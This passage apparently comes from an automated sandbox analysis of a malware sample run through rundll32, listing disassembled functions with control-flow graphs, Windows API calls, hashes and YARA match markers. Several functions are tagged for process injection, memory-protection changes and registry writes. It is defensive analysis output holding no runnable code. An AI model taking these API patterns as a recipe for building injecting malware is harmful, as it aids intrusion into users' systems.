                              control_flow_graph 217 5943959-5943991 call 594bad1 220 59439f5-5943a0a WaitForSingleObject 217->220 221 5943993 217->221 223 5943af4-5943b2d RtlExitUserThread 220->223 224 5943a10-5943a1e 220->224 222 5943996-59439ab call 594a651 221->222 240 59439dc-59439f3 call 594e803 222->240 241 59439ad-59439c4 222->241 228 5943b40-5943b67 CreateProcessA 223->228 229 5943b2f-5943b3b 223->229 225 5943a24-5943a45 RegOpenKeyA 224->225 226 5943ab0-5943ac3 call 5943829 224->226 230 5943a47-5943a69 RegSetValueExA RegCloseKey 225->230 231 5943a6f-5943a72 225->231 226->223 248 5943ac5-5943ad4 WaitForSingleObject 226->248 232 5943b74-5943b76 228->232 233 5943b69-5943b6f call 5945d7a 228->233 229->228 245 5943b3d 229->245 230->231 237 5943a74-5943a77 231->237 238 5943a79-5943aad call 594e778 231->238 242 5943b7e-5943b8c 232->242 243 5943b78-5943b79 call 594e803 232->243 233->232 237->226 237->238 238->226 240->220 240->222 241->240 254 59439c6-59439d7 call 593f39b 241->254 243->242 245->228 248->223 252 5943ad6-5943af1 call 594d30a 248->252 252->223 254->240
                              APIs
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                              • WaitForSingleObject.KERNEL32(00000000,?,05F39998,?,00000000,00000000,00000001), ref: 05943A03
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05943A3D
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 05943A60
                              • RegCloseKey.ADVAPI32(?), ref: 05943A69
                              • WaitForSingleObject.KERNEL32(00000000), ref: 05943ACD
                              • RtlExitUserThread.NTDLL(?), ref: 05943B03
                                • Part of subcall function 0594A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0593148A,?,?,?), ref: 0594A66F
                                • Part of subcall function 0594A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0593148A,?,?,?), ref: 0594A67F
                                • Part of subcall function 0594A651: CloseHandle.KERNEL32(000000FF,?,?,0593148A,?,?,?), ref: 0594A6E1
                              • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 05943B5C
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                              • String ID:
                              • API String ID: 3876914104-0
                              • Opcode ID: 399cad79aff6905c1e145a7ed3fdb29d7309027884980195480cdd29907ac0d5
                              • Instruction ID: 3c4970fb4b4c7fc44ab0a224750438d271eb9e6a6cd880c42b8c89459400ca9a
                              • Opcode Fuzzy Hash: 399cad79aff6905c1e145a7ed3fdb29d7309027884980195480cdd29907ac0d5
                              • Instruction Fuzzy Hash: BF614E71A14209AFEB00DFA5C885EAEBBBDFB08324F014525FA09E7250DB34AD61CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05938C35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 258 5938c35-5938c63 call 5953d64 call 59466d7 263 5938c69-5938c7a call 59333a5 258->263 264 5938d98-5938d9f 258->264 271 5938d90-5938d96 GetLastError 263->271 272 5938c80-5938ca9 call 593a253 263->272 265 5938db5 264->265 266 5938db8-5938dc4 call 5953d9f 264->266 265->266 271->265 272->266 275 5938caf-5938cb6 272->275 276 5938d13-5938d3c VirtualProtect 275->276 277 5938cb8-5938cbf 275->277 279 5938d47-5938d81 RtlEnterCriticalSection RtlLeaveCriticalSection call 59374ae 276->279 280 5938d3e-5938d42 call 593bdee 276->280 277->276 278 5938cc1-5938cd0 call 593ea5e 277->278 278->276 287 5938cd2-5938ce0 call 59333a5 278->287 284 5938d86-5938d88 279->284 280->279 284->266 286 5938d8a-5938d8e 284->286 286->266 287->276 290 5938ce2-5938cfa 287->290 291 5938d03-5938d0d VirtualProtect 290->291 292 5938cfc 290->292 291->276 292->291
                              APIs
                                • Part of subcall function 059333A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 059333CA
                                • Part of subcall function 059333A5: GetLastError.KERNEL32(?,00000000), ref: 059333D2
                                • Part of subcall function 059333A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 059333E9
                                • Part of subcall function 059333A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0593340E
                              • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61,00000002,?,00000001,80000000,05959A20,80000000), ref: 05938D90
                                • Part of subcall function 0593A253: lstrlen.KERNEL32(?,?), ref: 0593A28B
                                • Part of subcall function 0593A253: lstrcpy.KERNEL32(00000000,?), ref: 0593A2A2
                                • Part of subcall function 0593A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0593A2AB
                                • Part of subcall function 0593A253: GetModuleHandleA.KERNEL32(00000000), ref: 0593A2C9
                              • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05938D0D
                              • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61), ref: 05938D28
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05938D4D
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05938D6B
                                • Part of subcall function 059333A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 05933417
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 8eb11c7bb34a20d6b69d80c6bf30b3b78e7cf2a775e6016c9c8f6bbd4e0d5932
                              • Instruction ID: 7cd9ec9f9c19adfe31b01e8c64bbd864fc0670731e49d15b52de39c510685784
                              • Opcode Fuzzy Hash: 8eb11c7bb34a20d6b69d80c6bf30b3b78e7cf2a775e6016c9c8f6bbd4e0d5932
                              • Instruction Fuzzy Hash: 63415B71900619EFDB11DF68C84AAAEBBF9FF48310F148219F925AB650D774E950CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059455E4 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 327 59455e4-5945623 call 59461ae VirtualAlloc 330 59456f4 327->330 331 5945629-5945634 call 59461ae 327->331 333 59456fc-59456fe 330->333 334 5945639-594563f 331->334 335 5945700-5945708 VirtualFree 333->335 336 594570e-5945719 333->336 337 5945667-5945669 334->337 338 5945641-5945645 334->338 335->336 337->330 340 594566f-5945673 337->340 338->337 339 5945647-5945665 VirtualFree VirtualAlloc 338->339 339->331 339->337 340->330 341 5945675-5945680 340->341 341->333 342 5945682 341->342 343 5945688-5945695 342->343 344 5945697-59456a0 lstrcmpi 343->344 345 59456d1-59456eb 343->345 344->345 346 59456a2-59456ad StrChrA 344->346 345->333 347 59456ed-59456f2 345->347 348 59456bd-59456cd 346->348 349 59456af-59456bb lstrcmpi 346->349 347->333 348->343 350 59456cf 348->350 349->345 349->348 350->333
                              APIs
                                • Part of subcall function 059461AE: GetProcAddress.KERNEL32(?,00000318), ref: 059461D3
                                • Part of subcall function 059461AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 059461EF
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594561D
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05945708
                                • Part of subcall function 059461AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05946359
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05945653
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594565F
                              • lstrcmpi.KERNEL32(?,00000000), ref: 0594569C
                              • StrChrA.SHLWAPI(?,0000002E), ref: 059456A5
                              • lstrcmpi.KERNEL32(?,00000000), ref: 059456B7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: ceeec7b0763a1db7dd5ba2df0f528243c209ae05852fbd0e68c46d97a0748565
                              • Instruction ID: 1340f948a491b6757fb3af7dc9d1889c94f4d8cf5baa538b10c0ab0db7965e20
                              • Opcode Fuzzy Hash: ceeec7b0763a1db7dd5ba2df0f528243c209ae05852fbd0e68c46d97a0748565
                              • Instruction Fuzzy Hash: 0F316D71509311ABD721CF51D844F2BBBE9FF88B54F120918F989A6240D770ED14CFA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059312E7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 059373EB: memset.NTDLL ref: 059373F5
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?), ref: 05931381
                              • SetEvent.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0593138E
                              • Sleep.KERNEL32(00000BB8,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05931399
                              • ResetEvent.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059313A0
                              • CloseHandle.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059313A7
                              • GetShellWindow.USER32 ref: 059313B2
                              • GetWindowThreadProcessId.USER32(00000000), ref: 059313B9
                                • Part of subcall function 0594B1DC: RegCloseKey.ADVAPI32(0593E2A4), ref: 0594B25F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: 227467115767ce61aa053b5b40174f072bf196d959b418e425468932ceb0b39d
                              • Instruction ID: d4f12e45d6063370a2b7b0b88d4e8da50ea0174c6852e30bd13d59eb10f2d561
                              • Opcode Fuzzy Hash: 227467115767ce61aa053b5b40174f072bf196d959b418e425468932ceb0b39d
                              • Instruction Fuzzy Hash: 3121B072618300FFC3106B66AC4BE2FBF6EFBC9611B558104F60A87501DF35A851DBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945800 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetLastError.KERNEL32(?,?,80000000,00000001,?,059560C0,00000018,05934B2B,?,00000201,05959A24,059599DC,-0000000C,?), ref: 05945843
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,059560C0,00000018,05934B2B), ref: 059458CE
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 059458F7
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05945915
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: f860fbf494a4c6c85eac53d10974e53c411937a65418787ea6b54726f0545723
                              • Instruction ID: 24734e651adaf4683b53fb68b9cdb431955c881c238b9e1bfe2cb28cc2cf8b4a
                              • Opcode Fuzzy Hash: f860fbf494a4c6c85eac53d10974e53c411937a65418787ea6b54726f0545723
                              • Instruction Fuzzy Hash: AF414F71A00709EFDB11DFA5C885EADBBF9FF48310B118515E919D7210D774AA61CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05948F62 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 519 5948f62-5948f75 call 5939394 522 5949037 519->522 523 5948f7b-5948fb0 GetModuleHandleA GetProcAddress 519->523 524 594903e-5949045 522->524 525 5948fb2-5948fc6 GetProcAddress 523->525 526 594902f-5949035 call 594e803 523->526 525->526 527 5948fc8-5948fdc GetProcAddress 525->527 526->524 527->526 530 5948fde-5948ff2 GetProcAddress 527->530 530->526 531 5948ff4-5949008 GetProcAddress 530->531 531->526 532 594900a-594901c call 593710a 531->532 534 5949021-5949026 532->534 534->526 535 5949028-594902d 534->535 535->524
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0593C71A,0593C71A,?,05946EFA,?,0593C71A,?,?,00000000), ref: 05948F87
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FA9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FBF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FD5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FEB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05949001
                                • Part of subcall function 0593710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05937167
                                • Part of subcall function 0593710A: memset.NTDLL ref: 0593718B
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: bc409e5dd86fe1b417dcdc8b5425076513627e053b8ec447c2c5317bd950d7e9
                              • Instruction ID: 9aa32fc89f6761880b7770725359222e2fc6e72f04080ee58d919900917cbc49
                              • Opcode Fuzzy Hash: bc409e5dd86fe1b417dcdc8b5425076513627e053b8ec447c2c5317bd950d7e9
                              • Instruction Fuzzy Hash: FB2157B060430AAFDB20EFA9D885D6BBBECFF04240B014526F905C7201EB74EE158F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059473AA Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,00000000,0594893A,0595A174,05950998), ref: 059473C1
                              • QueueUserAPC.KERNEL32(0594893A,00000000,?,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473D6
                              • GetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473E1
                              • TerminateThread.KERNEL32(00000000,00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473EB
                              • CloseHandle.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473F2
                              • SetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473FB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 4240f9236d1ccb1c472324b0c53815aa1d4ce9eb13127da4feb1f0949fcaefc7
                              • Instruction ID: 7f74e3f4348b8afc8e666da6c54d9adb4bc40342c546f2f89555e1d15faf535b
                              • Opcode Fuzzy Hash: 4240f9236d1ccb1c472324b0c53815aa1d4ce9eb13127da4feb1f0949fcaefc7
                              • Instruction Fuzzy Hash: 99F0F832219321BBD7221BB1AD0AF6FFF69FB09755F468404F60591152DB2198218B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594ED07 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110threadsynchronizationinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594ED35
                              • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0594EDBF
                              • WaitForSingleObject.KERNEL32(00000064), ref: 0594EDCD
                              • SuspendThread.KERNEL32(?), ref: 0594EDE0
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID: v
                              • API String ID: 3168247402-1801730948
                              • Opcode ID: 479b666dcc68bebf8b993e51d04407383adaa22888a582ddd2d19c766abfbb8f
                              • Instruction ID: 8003a1af58586ed1661ba033a8a90e8c9c96ee3087721b9557e13a15f750f0cf
                              • Opcode Fuzzy Hash: 479b666dcc68bebf8b993e51d04407383adaa22888a582ddd2d19c766abfbb8f
                              • Instruction Fuzzy Hash: 36412971108301AFE721DF64C845E6BBBEEFF88750F044929FA9482160D771E954CB63
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951ECA Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F4C
                              • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: cf6ed99b1148ab8aa40e185beebbde510e2a8190b9ce008597e6f691b799f054
                              • Instruction ID: 5b1ec3f59493c7aa7db693d2d56d90705e5f47d9faee468e24dde832aacae822
                              • Opcode Fuzzy Hash: cf6ed99b1148ab8aa40e185beebbde510e2a8190b9ce008597e6f691b799f054
                              • Instruction Fuzzy Hash: D71149B2514249FFDF019FA4DC85DAEBF7EFB88264B110426FA0593110EB319D64EB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594212C Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                              • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                              • IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                              • String ID:
                              • API String ID: 1712524627-0
                              • Opcode ID: db615811658fa2f952f12f6a87981e68f02532a9688d3ee6279dcc22355320b4
                              • Instruction ID: e26e7b2d36b47d7598cea3d626a1bb05391e0c51443c671d4672358064fd355c
                              • Opcode Fuzzy Hash: db615811658fa2f952f12f6a87981e68f02532a9688d3ee6279dcc22355320b4
                              • Instruction Fuzzy Hash: 5A016D75518704FFCB11DF65DA49C9EBFACFB88692B104225FA06D3200EB305A51CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059333A5 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 059333CA
                              • GetLastError.KERNEL32(?,00000000), ref: 059333D2
                              • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 059333E9
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0593340E
                              • SetLastError.KERNEL32(80000000,?,00000000), ref: 05933417
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: 1a6f15cb30c62f3dfcf77150908f1c1ed6a9b49fca17e16d059ef0a6ed9cb42f
                              • Instruction ID: 08257919da1e12e25648b735722615051824ca4eef8c5fac31cf48a5171a376d
                              • Opcode Fuzzy Hash: 1a6f15cb30c62f3dfcf77150908f1c1ed6a9b49fca17e16d059ef0a6ed9cb42f
                              • Instruction Fuzzy Hash: 7D012972504209FFDF129FA5DC458AEBFBDFF082547018426F905D2211EB71D964DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05949661 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,059362DD,?,?,?,?), ref: 05949686
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594969D
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,059362DD,?,?,?,?,?,?,00000000), ref: 059496B8
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,059362DD,?,?,?,?), ref: 059496D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: 720a0b8004a6d1ec4f2ce182a73f6e9154ae88d946a03bbb541f3d08828e9e5a
                              • Instruction ID: b20c646835bc8f3c19aaae996aa0c60ec3ce393359485f2e30551bc3d1c1a733
                              • Opcode Fuzzy Hash: 720a0b8004a6d1ec4f2ce182a73f6e9154ae88d946a03bbb541f3d08828e9e5a
                              • Instruction Fuzzy Hash: DF1166B6510218FFDB12CF98DC84CEFBFBDEB89350B104066F906A6210E6715E50DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059371B4 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371D3
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371DE
                              • _wcsupr.NTDLL ref: 059371EB
                              • lstrlenW.KERNEL32(00000000), ref: 059371F3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: 8f59dbf10e7ee7e99aea2c0e6c5ca073bd7ca9aca22ab85a181fd3a92aa81a14
                              • Instruction ID: 71226cd2640f656e38e86b97139102a8cb2fa7a85580e177140bc3983adf7995
                              • Opcode Fuzzy Hash: 8f59dbf10e7ee7e99aea2c0e6c5ca073bd7ca9aca22ab85a181fd3a92aa81a14
                              • Instruction Fuzzy Hash: FDF0E972209310AF9712ABB55C8EE7F9B5DFFC0AA5B210938F505D2140DF64CC11C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C384 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0594C3A3
                                • Part of subcall function 05938FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 05938FBA
                                • Part of subcall function 05938FAE: CloseHandle.KERNEL32(?), ref: 05938FC8
                                • Part of subcall function 05938FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05938FE4
                              • CloseHandle.KERNEL32(?), ref: 0594C3B1
                              • InterlockedDecrement.KERNEL32(0595A05C), ref: 0594C3C0
                                • Part of subcall function 0594E831: SetEvent.KERNEL32(00000330,0594C3DB), ref: 0594E83B
                                • Part of subcall function 0594E831: CloseHandle.KERNEL32(00000330), ref: 0594E850
                                • Part of subcall function 0594E831: HeapDestroy.KERNELBASE(05B40000), ref: 0594E860
                              • RtlExitUserThread.NTDLL(00000000), ref: 0594C3DC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID:
